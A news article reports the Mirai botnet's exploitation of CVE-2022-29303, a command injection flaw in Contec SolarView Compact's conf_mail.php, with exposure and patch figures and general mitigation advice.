A recent report by cybersecurity researchers at VulnCheck has revealed that hundreds of SolarView systems, which are accessible through the internet, have been patched against a critical command injection vulnerability. However, experts are concerned that both the Mirai botnet hackers and inexperienced individuals have already started exploiting the vulnerability, and more attackers are expected to join in.
According to Unit 42 researchers at Palo Alto Networks, the Mirai botnet is taking advantage of a command injection vulnerability (CVE-2022-29303) in Contec’s SolarView Series software. SolarView is widely used in over 30,000 solar power stations, making it an attractive target for cybercriminals. Among the vulnerabilities, CVE-2022-29303 is considered to be one of the most critical.
CVE-2022-29303 is a command injection vulnerability discovered in SolarView Compact ver.6.00 through conf_mail.php. It has a CVSS score of 9.8, indicating its severity. The flaw allows attackers to execute commands on vulnerable systems, potentially leading to unauthorized access and control.
Currently, there are over 600 SolarView systems indexed by Shodan, an internet search engine that allows users to find specific types of devices connected to the internet. SolarView is designed to track and display solar power generation and storage for small to medium-scale installations.
VulnCheck Exploit Intelligence has identified public exploits targeting SolarView systems, raising concerns about the potential scope and impact of this vulnerability. In addition to power stations, SolarView has deployment scenarios in buildings and commercial solar power plants.
Although internet-accessible Contec SolarView systems are not common due to their focus on industrial control systems (ICS) networks, the vulnerability in SolarView Compact ver.6.00, which dates back to 2019, poses a risk to exposed hosts. Despite the release of newer versions, such as 6.20, 7.00, 8.00, and 8.10, the vulnerability remains unaddressed.
Experts have discovered that the command injection vulnerability in conf_mail.php has existed since version 4.00 of SolarView Compact. It was only in version 8.00 that validation was implemented for the attacker-controlled $mail_address variable when conf_mail.php was included in the auth require list. This means that less than one-third of the internet-exposed SolarView systems have fixed the vulnerability so far.
The exploitation of CVE-2022-29303 was not initially reported by Unit 42. In fact, an entry for this vulnerability has existed on Exploit-DB since May 2022. Furthermore, SolarView systems are also vulnerable to other unauthenticated Remote Code Executions (RCEs) such as CVE-2023-23333 and CVE-2022-44354.
Considering that SolarView systems serve as monitoring systems, the worst-case scenario would likely involve a loss of visibility. However, the impact of the exploitation can vary depending on the network integration of the SolarView hardware, potentially resulting in more severe consequences.
Organizations are advised to monitor their public IP space and stay updated on public exploits targeting their essential systems. It is crucial to implement proper security measures and regularly update software to mitigate the risk of such vulnerabilities.
In conclusion, the critical command injection vulnerability in SolarView systems poses a significant risk to solar power stations and other installations. The exploitation of this vulnerability by Mirai botnet hackers and other attackers highlights the importance of implementing strong cybersecurity measures and promptly addressing known vulnerabilities.